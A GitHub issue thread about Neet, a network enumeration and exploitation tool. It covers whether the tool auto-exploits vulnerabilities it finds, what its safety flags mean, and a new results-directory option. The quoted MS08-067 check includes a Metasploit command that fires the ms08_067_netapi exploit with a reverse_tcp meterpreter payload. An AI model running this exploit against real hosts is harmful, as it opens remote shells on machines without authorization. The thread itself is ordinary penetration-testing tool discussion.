JonnyHightower / neet

Neet - Network Enumeration and Exploitation Tool
GNU General Public License v3.0
168 stars 31 forks

Metasploit Checks #11

Open aldo1901 opened 7 years ago

aldo1901 commented 7 years ago

I know you are porting to msfconsole instead of msfcli. My question was regarding some of your checks. For example, I can see here that you are checking for MS08-067 but it seems you're also executing the exploit. Does Neet automatically exploit everything it finds vulnerable?

[CHECK]
name MS08-067 Server
label [GSM-WinVA-MS08-067]
desc Windows Server Service Remote Path Canonicalization Stack Overflow
type Windows
enabled 1

msref MS08-067
cve CVE-2008-4250
bid 31876

check [BIN]/ms08-067_check.py -s -t HOST 2>/dev/null
vuln VULNERABLE

notest XP|2003

notest XP

exarch 32-bit
extype metasploit
exmancmd exploit/windows/smb/ms08_067_netapi RHOST=HOST LHOST=[LOCAL] TARGET=0 LPORT=[LOCALPORT] PAYLOAD=windows/patchupmeterpreter/reverse_tcp E

exautosafe 0
exmanusafe 0

Also, can I change where the information gets outputted? As in, instead of having the folder where I ran Neet from full of folders containing a specific scan, could I just tell it to create a directory and dump the results of a specific scan into that folder? This will be easier for organizational purposes.

Thank You

JonnyHightower commented 7 years ago

Good questions. No, neet doesn't automatically exploit everything it finds vulnerable. It used to have automatic exploitation turned on years ago, and you'd run neet with -x (or -X - I can't remember) to disable auto exploitation. At the moment it's permanently disabled. It used the exautosafe parameter to know if the exploit was safe for automatic exploitation. If set to 0, then it wouldn't exploit it even with auto-exploitation on. The exmanusafe is to mark whether an exploit is safe for manual exploitation. Some exploits knock machines over. In the neet shell you can use the "exploit" command which will offer you a choice of vulnerabilities you can exploit on the current host. If exmanusafe is 0 for a particular exploit, you won't be offered it. In that case, you'd use the "uexploit" (short for unsafe exploit) command to be offered the unsafe ones. I'll answer your other question shortly.
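The flag behaviour described in the reply above, as an added example that is not part of the thread and is not Neet's own code: it parses stanzas laid out like the quoted check and reports in which mode each would be offered. The function names, the second stanza, treating a missing flag as 0, and `uexploit` also listing safe entries are assumptions.

```python
# Added example (not Neet's code): models the safety flags described above.
# The stanza layout follows the check quoted in the issue; the second
# stanza is constructed, and a missing flag is treated as 0 (assumption).
SAMPLE = """\
[CHECK]
name MS08-067 Server
label [GSM-WinVA-MS08-067]
enabled 1
notest XP|2003
notest XP
exautosafe 0
exmanusafe 0

[CHECK]
name Constructed Safe Check
label [EXAMPLE-SAFE]
enabled 1
exautosafe 1
exmanusafe 1
"""

def parse_checks(text):
    """Return one dict per [CHECK] stanza; repeated keys keep every value."""
    checks = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "[CHECK]":
            checks.append({})
        elif line and checks:
            key, _, value = line.partition(" ")
            checks[-1].setdefault(key, []).append(value.strip())
    return checks

def flag(check, key):
    """True only when the flag is present and its last value is 1."""
    return check.get(key, ["0"])[-1] == "1"

def offered(check, mode, auto_enabled=False):
    """mode is 'auto', 'exploit' or 'uexploit', as named in the reply."""
    if mode == "auto":      # exautosafe 0 blocks it even with auto on
        return auto_enabled and flag(check, "exautosafe")
    if mode == "exploit":   # only entries marked safe for manual use
        return flag(check, "exmanusafe")
    if mode == "uexploit":  # offers the unsafe ones; safe ones too (assumption)
        return True
    raise ValueError(f"unknown mode: {mode}")

def summary(text, auto_enabled=False):
    """Map each check label to the modes in which it would be offered."""
    modes = ("auto", "exploit", "uexploit")
    return {c["label"][0]: [m for m in modes if offered(c, m, auto_enabled)]
            for c in parse_checks(text)}
```

With the flags quoted in the issue (both 0), the MS08-067 entry appears only under `uexploit`, whether or not automatic exploitation is switched on.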

aldo1901 commented 7 years ago

Thanks. Btw, awesome tool, very well parsed.

JonnyHightower commented 7 years ago

Thanks! I hope the previous answer made sense - I was rushing to get out and fetch someone. There's no current way to change the results folder - I always create one and then cd into it before running Neet. It would be pretty easy to implement though I think. I'll look into it and let you know back here shortly.

JonnyHightower commented 7 years ago

Hey aldo1901. If you run neet-update, you will now be able to specify an output directory with "-r directory" or "--results-dir=directory". I think I've tested it well enough. Let me know if you find any issues. :-)

Greadsky commented 7 years ago

Hello, sorry, I still have a question about using Metasploit with neet. In my case it doesn't see the file msfcli, which no longer exists in new versions of Metasploit. So what do I need to change in the neet configuration to let it use Metasploit modules? Thanks in advance.